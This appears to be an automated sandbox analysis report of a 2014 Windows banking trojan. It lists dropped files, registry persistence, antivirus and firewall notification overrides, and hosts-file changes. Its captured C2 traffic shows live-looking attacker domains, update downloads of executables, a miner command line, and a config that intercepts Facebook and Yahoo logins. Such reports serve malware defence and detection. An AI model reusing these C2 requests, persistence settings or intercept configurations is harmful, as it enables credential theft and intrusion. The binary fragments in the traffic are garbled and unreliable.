MD5: a2c961cdfeee401ab86cacfc30c635d9
SHA1: 052afc6c5892552250bbedf594bdd3096fdcaa2f
SHA256: 8f71a71da67d0aa98115b6321eb6662925992a0ad153ab6cae10679c71d61cda
SSDeep: 24576:werCHfOzbRrOvhSa21HIipycSj8nUF7eYwjzbH0:hrvspSa8HIoyX9BwjzY
Size: 804864 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: Windows
Created at: 2014-02-12 19:46:30
Analyzed on: WindowsXP SP3 32-bit

Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

r3uo4fe6swuxb.exe:3140
gaumoefy7ic7km0c.exe:3704
gaumoefy7v7bkm0c.exe:3952
r3uo4fe6k0jxbf9xzwtt.exe:2740
%original file name%.exe:1072
wuauclt.exe:1876
mifnhxlktoj.exe:3920
mifnhxlktoj.exe:4552
mifnhxlktoj.exe:884
nxjupqomtrc.exe:5736
nxjupqomtrc.exe:5104
r3uo4fe75uzxb.exe:4436
r3uo4fe6x4rxb.exe:2304
gaumoefy7al4km0c.exe:3436
r3uo4fe6l5rxb.exe:2852

The Trojan injects its code into the following process(es):
No processes have been created.

File activity

The process r3uo4fe6swuxb.exe:3140 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\tst (10 bytes)

The process gaumoefy7ic7km0c.exe:3704 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\tst (10 bytes)

The process r3uo4fe6k0jxbf9xzwtt.exe:2740 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\mifnhxlktoj.exe (5873 bytes)
%System%\ajbgsktanfne\tst (10 bytes)
%System%\ajbgsktanfne\etc (10 bytes)
%System%\drivers\etc\hosts (22 bytes)

The Trojan deletes the following file(s):

%System%\drivers\etc\hosts (0 bytes)

The process %original file name%.exe:1072 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\tst (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\r3uo4fe6k0jxbf9xzwtt.exe (3877 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\r3uo4fe6k0jxbf9xzwtt.exe (0 bytes)

The process wuauclt.exe:1876 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
%WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2016 bytes)
%WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)

The Trojan deletes the following file(s):

%WinDir%\SoftwareDistribution\DataStore\Logs\tmp.edb (0 bytes)

The process mifnhxlktoj.exe:3920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\rng (48 bytes)
%WinDir%\Temp\r3uo4fe75uzxb.exe (35 bytes)
%System%\ajbgsktanfne\run (10 bytes)
%WinDir%\Temp\r3uo4fe6l5rxb.exe (35 bytes)
%WinDir%\Temp\r3uo4fe6x4rxb.exe (26431 bytes)
%System%\nxjupqomtrc.exe (5873 bytes)
%System%\ajbgsktanfne\tst (10 bytes)
%System%\ajbgsktanfne\cfg (110 bytes)
%WinDir%\Temp\r3uo4fe6swuxb.exe (5873 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\r3uo4fe6swuxb.exe (0 bytes)
%WinDir%\Temp\r3uo4fe6l5rxb.exe (0 bytes)
%WinDir%\Temp\r3uo4fe6x4rxb.exe (0 bytes)

The process mifnhxlktoj.exe:4552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\gaumoefy7ic7km0c.exe (7547 bytes)
%System%\ajbgsktanfne\rng (64 bytes)
%WinDir%\Temp\gaumoefy7al4km0c.exe (35 bytes)
%System%\ajbgsktanfne\ihst (224 bytes)
%System%\ajbgsktanfne\run (10 bytes)
%WinDir%\Temp\gaumoefy7v7bkm0c.exe (35 bytes)
%System%\nxjupqomtrc.exe (7547 bytes)
%System%\ajbgsktanfne\tst (10 bytes)
%System%\ajbgsktanfne\cfg (394 bytes)
%System%\drivers\etc\hosts (904 bytes)
%System%\ajbgsktanfne\por (1 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\gaumoefy7al4km0c.exe (0 bytes)
%WinDir%\Temp\gaumoefy7ic7km0c.exe (0 bytes)
%WinDir%\Temp\gaumoefy7v7bkm0c.exe (0 bytes)

The process mifnhxlktoj.exe:884 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\tst (10 bytes)

The process nxjupqomtrc.exe:5736 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\tst (10 bytes)

The process nxjupqomtrc.exe:5104 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\tst (10 bytes)

The process r3uo4fe6x4rxb.exe:2304 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%System%\ajbgsktanfne\tst (10 bytes)
%System%\mifnhxlktoj.exe (7547 bytes)

The Trojan deletes the following file(s):

%System%\mifnhxlktoj.exe (0 bytes)

Registry activity

The process r3uo4fe6swuxb.exe:3140 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 BA 66 ED 2C 29 2E 4E 45 2A 55 11 71 7E B8 55"

The process gaumoefy7ic7km0c.exe:3704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 EF B5 8B 5B 11 72 EC 86 1F 45 2E EF 78 FA 67"

The process gaumoefy7v7bkm0c.exe:3952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC C1 10 C6 45 4D 54 68 84 90 FC 90 6F FD 0B 30"

The process r3uo4fe6k0jxbf9xzwtt.exe:2740 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D5 6B F9 CE AA 98 C8 32 27 92 A3 52 FE C9 A9 08"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Office Net.Tcp DNS Input Card" = "%System%\mifnhxlktoj.exe"

The process mifnhxlktoj.exe:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B BD 66 D1 BF 93 95 FD 02 E9 81 1E 57 0C 1E 82"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
"FirewallDisableNotify" = "1"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The process mifnhxlktoj.exe:4552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 02 00 00 00 01 00 00 00 00 00 00 00"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusOverride" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallOverride" = "1"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FB 04 E8 8A E7 0F 2E 7D 2A DB A8 45 A4 4D EF 9E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

Antivirus notifications are disabled:

[HKLM\SOFTWARE\Microsoft\Security Center]
"AntiVirusDisableNotify" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process r3uo4fe75uzxb.exe:4436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 FB EB D6 06 7B A5 C9 FF 37 AD 0B C1 16 61 47"

The process gaumoefy7al4km0c.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 1B A3 93 B1 ED DF F4 D2 E8 A7 F2 EA 13 52 04"

The process r3uo4fe6l5rxb.exe:2852 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 D9 9D 73 4E A2 89 42 20 AA 83 10 4E E2 67 85"

Dropped PE files

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 804 bytes in size. The following strings are added to the hosts file listed below:

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL	IP
hxxp://donaven4guia.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800	216.239.138.217
hxxp://fredesecas.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800	216.239.139.20
hxxp://laloponea.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800	216.239.138.68
hxxp://davedekilai.com/forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800	66.147.244.161
hxxp://tablefruit.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800	98.139.135.198
hxxp://wifeyesterday.net/forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800	216.239.139.88
hxxp://wifeyesterday.net/forum/search.php?method=all&flag&mode=sox&v=023&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	216.239.139.88
hxxp://wifeyesterday.net/forum/search.php?method=update&noxor&exe=mifnhxlktoj.exe&reg=Office Net.Tcp DNS Input Card&svc=Distributed Brightness Video Defender&wname=nxjupqomtrc.exe&dir=ajbgsktanfne&mode=sox&v=023&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	216.239.139.88
hxxp://wifeyesterday.net/forum/search.php?method=checkport&port=32310&mode=sox&v=023&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	216.239.139.88
hxxp://donaven4guia.com/index.php?method=validate&mode=sox&v=029&sox=3c2d4800	216.239.138.217
hxxp://fredesecas.com/index.php?method=validate&mode=sox&v=029&sox=3c2d4800	216.239.139.20
hxxp://laloponea.com/index.php?method=validate&mode=sox&v=029&sox=3c2d4800	216.239.138.68
hxxp://davedekilai.com/index.php?method=validate&mode=sox&v=029&sox=3c2d4800	66.147.244.161
hxxp://tablefruit.net/index.php?method=validate&mode=sox&v=029&sox=3c2d4800	98.139.135.198
hxxp://tablefruit.net/index.php?method=all&flag&mode=sox&v=029&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198
hxxp://tablefruit.net/index.php?method=hostname&host=www.facebook.com&mode=sox&v=029&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0	98.139.135.198

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

GET /index.php?method=validate&mode=sox&v=029&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: donaven4guia.com

HTTP/1.1 404 Not Found

Date: Sat, 10 May 2014 19:11:36 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: wifeyesterday.net

HTTP/1.1 200 OK

Date: Sat, 10 May 2014 19:11:10 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
304. GoS........wifeyesterday.net..........M....D..w.x.5w. H..zY..R...
.q.Yu..-S....8_..y..|.:../....d.YuC..>&.....[.._...T...\[email protected].
..8...2.u9..J..~j..cS.t...".|..H..r..k..J.8..(/%.t!.../q.KYO....{.t..M
IW.m.......C.#f....yu...~........."G...bS4..9..V....}w....u....Mf....K
....rey..4;......%..z.D.P&.:\..,..vt.. ...o.e.2........u.}...J..l.3.M.
33g?...W..m.f......s....rs..N...WJY.......ML/5....B.....A.M.v...=.E.[.
[email protected]@.i..1 .(.-."_.dJ..mr......Y..?..rW.......O....cW0....6wAIB
I..f......YG9...|.7y.....d.(Zbm....".V..o..d.....*.k...Q...aT.....~...
.w.0....?r....5....I.sjq..Em.....-....x|M.,.:<v..p...~r.).m|;o.....
.z:-..f......t/.A...(.?......w....6mN.....r.I.]..Ay..#...E..~.,-......
..}.8..Y.I...T....4.T\..E.....M....$...F.~....x,}57..=Pnlc~.ha..i..!.e
.R.P.SO...Bt.1H.D.Z..kROR.u.... /..b|..2h"E4......8...(.......w.\..{.%
E6.9.U.|-...]....K..5..w...\]....wqD.....i..1...]c$.....>#...o.R.,j
..,[email protected].`)&....E.........b9gR<.^.P7...2L
.....n...K.1&.,[email protected].... $..7.........U..../........L...<.Fv.
.-{.y...0.a=g...C..v&:......z...z~.._....IM. [email protected]..$.n.Y.
.o6..B......P.M-R...;[email protected].#.uY.S...qQ...30*r.M............&..>-.
<.TV.d2.".$......C:. =.I..$.&.Z|...PrH.D..=...=......0d.....X.\...[
* ...

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: fredesecas.com

HTTP/1.1 404 Not Found

Date: Sat, 10 May 2014 19:11:04 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /forum/search.php?method=checkport&port=32310&mode=sox&v=023&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wifeyesterday.net

HTTP/1.1 200 OK

Date: Sat, 10 May 2014 19:11:14 GMT

Server: Apache/2

Content-Length: 0

Connection: close

Content-Type: text/html

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: laloponea.com

HTTP/1.1 404 Not Found

Date: Sat, 10 May 2014 19:11:05 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /forum/search.php?method=all&flag&mode=sox&v=023&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wifeyesterday.net

HTTP/1.1 200 OK

Date: Sat, 10 May 2014 19:11:10 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
ping.12.FLAG UPDATE cfg.269."frontride.net" "glasshealth.net" "uponlou
d.net" "spendmarry.net" "wrongthrew.net" "mightglossary.net" "throughc
ountry.net" "rememberpaint.net" "tablefruit.net" "necessarydress.net" 
"gentlefriend.net" "wifeknew.net" "littleappear.net" "udagdarta.com" "
lasopeidres.com" var_user_ip.613.%kill_jhminer% = "1";.%invite_cc% = "
1";.ºn_contact% = "1";.%live_link% = "hXXp://helpdesk.corp.ebay.com/
chat.php?id=4094&sess=77a098b4d1da87f63bf02d604284ec13&talk=1";.ëayl
ive% = "partyorderly.net";.%set_intercepts% = ""VVV.facebook.com" "par
tyorderly.net" "/fb_login/" "/login/" "1" "facebook.com" "partyorderly
.net" "/fb_login/" "/login/" "0" "mail.yahoo.com" "partyorderly.net" "
/yahoo/" "/config/" "0" ";.Þp_host% = "partyorderly.net";.Þp_path%
 = "/dep/";.%no_password% = "0";.%timer% = "480";.%cpuinfo% = " Intel(
R) Xeon(R) CPU E3-1245 V2 @ 3.40GHz (3386 MHz)";.%state% = "EN";.%newp
ort% = "34199";.plugin.55070.miner_forced.80.win32drkclient.exe -a X11
 -o stratum tcp://"%local server IP%":3388 -u 3c2d4800 -p x.MZ.............
.........@...............................................!..L.!This pr
ogram cannot be run in DOS mode....$.........lg...4...4...4.?y4...4...
4...49..4...4...4...4...4...4...4...4...4...4Rich...4................P
E..L.....\S.....................N....................@................
.............................................................(........
...............................................................@......
.........(............................text...H....................
<<< skipped >>>

GET /index.php?method=setvar&key=cpuinfo&value=Intel(R) Core(TM) i7-4770 CPU @ 3.40GHz (3392 MHz)&mode=sox&v=029&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 10 May 2014 19:11:40 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
.............

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 502 Cannot find server.

Date: Sat, 10 May 2014 19:11:06 GMT

Server: YTS/1.20.28

Cache-Control: no-store

Content-Type: text/html

Content-Language: en

Content-Length: 2477
<HEAD><TITLE>Cannot find server.</TITLE></HEAD>
;.<BODY BGCOLOR="white" FGCOLOR="black">.<FONT FACE="Helvetic
a,Arial"><B>. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 
Final//EN"><html><head><style>a:link {font:8pt/11
pt verdana; color:red}a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style><meta HTTP-EQUIV="Content-Type" Content="text-html; c
harset=Windows-1252"><title>Cannot find server</title>&
lt;/head><body bgcolor="white"><table width="400" cellpadd
ing="3" cellspacing="5"><tr><td id="tableProps2" align="le
ft" valign="middle" width="360"><h1 id="textSection1"style="COLO
R: black; FONT: 13pt/15pt verdana"><span id="errorText">The p
age cannot be displayed</span></h1></td></tr>&
lt;tr><td id="tablePropsWidth" width="400" colspan="2"><fo
nt style="COLOR: black; FONT: 8pt/11pt verdana">The page you are lo
oking for is currently unavailable. The Web site might be experiencing
 technical difficulties, or you may need to adjust your browser settin
gs.</font></td></tr><tr><td id="tablePropsW
idth" width="400" colspan="2"><font id="LID1"style="COLOR: black
; FONT: 8pt/11pt verdana"><hr color="#C0C0C0" noshade><p i
d="LID2">Please try the following:</p><ul><li id="in
structionsText1">Click the Refresh button, or try again later.</
li><li id="instructionsText2"> If you typed the page addr
<<< skipped >>>

GET /index.php?method=validate&mode=sox&v=029&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 10 May 2014 19:11:39 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
304..,qS........tablefruit.net..........6.kO.....W[..f.3. ..Q....!...[
.6......-G..4"!..o.C<........ `.....AF...QK:.fq..Y...rP<...L....
...n.......;.FX.......#.....x...B..%............].!#.S..... d..p&.....
 $.O$.....g.......XQ.............\..Brz`...BL_oZ.>...M........g.=.&
gt;..:.Rc6.../..J........$.!...G?...V.:..........ep.......cd]..X..-..-
.-i..^:...."..2{s.7a?JMK.;H..C"...L..A-...._.....p..6...z2(..!J?*#..Y.
$.. ..r.m.....^..n"..R...#....."......c8].c....4..V>.fI.LY.h.3....j
..Lh....i8N..i...?........c.=...........K...."V.\mHD..&X2....OxYR..@Rs
4K....cP....w........;.r.(<.H.....c.T...0.#:LH...0.....I.RZ.;...RE.
..N..L..5..........Q...A.v.....eY...d..)D.p.'.;.$5.QY..]`.Z.b..>...
p.Y..X.....%.X.U.Lr..;...z.qA|o.Hd....p......|M.e.N....A.\..Cb}2."caZZ
.....5....X.S..pmo...t....v.S.%<[email protected]....~..x....?......,...e[A..
..Z.)...3.......1..O .sy*.#...H.........D.N..U.5....,sm\b..e.oJJ...=*V
M9kUUEi.~..:....'#w...>N....Q.l6..{..u.ep.....M6.-......yhg.......a
yW....7....9].._:...|....V...W.9. ......w)F....\....K..@f.,...}....,5.
.8.....y.@$.9)...].{S.....S..x...I^...Q.g....!.M."...*u.......f..I...y
V}n.E.D..La..aU"Fi ...y.9...*...C..3.......J..b.x.P.)T..............d.
q."..|..s...]..P..D?..$.,'.y.....K".....6#..W..J.0>Ud.:...
<<< skipped >>>

GET /index.php?method=validate&mode=sox&v=029&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: laloponea.com

HTTP/1.1 404 Not Found

Date: Sat, 10 May 2014 19:11:37 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /index.php?method=hostname&host=VVV.facebook.com&mode=sox&v=029&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 10 May 2014 19:11:40 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
..........................

GET /index.php?method=all&flag&mode=sox&v=029&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: tablefruit.net

HTTP/1.0 200 OK

Date: Sat, 10 May 2014 19:11:39 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
ping.5.FLAG cfg.269."rememberpaint.net" "gentlefriend.net" "mightgloss
ary.net" "necessarydress.net" "uponloud.net" "spendmarry.net" "frontri
de.net" "wifeknew.net" "tablefruit.net" "glasshealth.net" "throughcoun
try.net" "wrongthrew.net" "littleappear.net" "lasopeidres.com" "udagda
rta.com" var_user_ip.570.%invite_cc% = "1";.ºn_contact% = "1";.%live
_link% = "hXXp://helpdesk.corp.ebay.com/chat.php?id=4094&sess=77a098b4
d1da87f63bf02d604284ec13&talk=1";.ëaylive% = "partyorderly.net";.%se
t_intercepts% = ""VVV.facebook.com" "partyorderly.net" "/fb_login/" "/
login/" "1" "facebook.com" "partyorderly.net" "/fb_login/" "/login/" "
0" "mail.yahoo.com" "partyorderly.net" "/yahoo/" "/config/" "0" ";.Þ
p_host% = "partyorderly.net";.Þp_path% = "/dep/";.%no_password% = "0
";.%timer% = "480";.%cpuinfo% = " Intel(R) Xeon(R) CPU E3-1245 V2 @ 3.
40GHz (3386 MHz)";.%state% = "EN";..............

GET /forum/search.php?method=update&noxor&exe=mifnhxlktoj.exe®=Office Net.Tcp DNS Input Card&svc=Distributed Brightness Video Defender&wname=nxjupqomtrc.exe&dir=ajbgsktanfne&mode=sox&v=023&sox=3c2d4800&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wifeyesterday.net

HTTP/1.1 200 OK

Date: Sat, 10 May 2014 19:11:11 GMT

Server: Apache/2

Connection: close

Content-Type: text/html
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
......................................................................
......................PE..L....9mS.................n..........B.......
......@...............................................................
...........<..P....................................................
...................@....................;..`....................text..
.&l.......n.................. ..`.rdata..t............r..............@
[email protected]...>..............@...........................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
....................................................x.J...........V...
.x.J.......D$..t.V.e........^................................L$..T$.V.
t$.W...r...;.u.............s...tD.....9 .u1...v5..B...y. .u ...v$..B..
.y. .u....v...B...I. ...._...^._3.^.............QV..j..L$.......F....s
[email protected]$......^Y..........QVW..j..L$..{....G...v....s.H.G..w........L$
.#......_..^Y...........J...........QW.9..t?j..L$..(....G...v....s.H.G
.V.w........L$.#.. .....t.....j.....^_Y........D$..V......J.t.V.......
...^....Q.A$V.0W.|[email protected]$........_^
<<< skipped >>>

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: davedekilai.com

HTTP/1.1 302 Found

Date: Sat, 10 May 2014 19:11:05 GMT

Server: Apache

Location: hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekilai.com?method=validate&mode=sox&v=023&sox=3c2d4800

Content-Length: 375

Connection: close

Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>302 Found</title>.</head><body
>.<h1>Found</h1>.<p>The document has moved <a 
href="hXXp://box661.bluehost.com/suspended.page/disabled.cgi/davedekil
ai.com?method=validate&mode=sox&v=023&sox=3c2d4800">her
e</a>.</p>.<hr>.<address>Apache Server at dave
dekilai.com Port 80</address>.</body></html>...

GET /index.php?method=validate&mode=sox&v=029&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: fredesecas.com

HTTP/1.1 404 Not Found

Date: Sat, 10 May 2014 19:11:37 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

Connection: close

Content-Type: text/html
Unknown Virtual Host...

GET /forum/search.php?method=validate&mode=sox&v=023&sox=3c2d4800 HTTP/1.0

Accept: */*

Connection: close

Host: donaven4guia.com

HTTP/1.1 404 Not Found

Date: Sat, 10 May 2014 19:11:03 GMT

Server: Apache/2

Accept-Ranges: bytes

Content-Length: 21

Cache-control: no-store

Pragma: no-cache

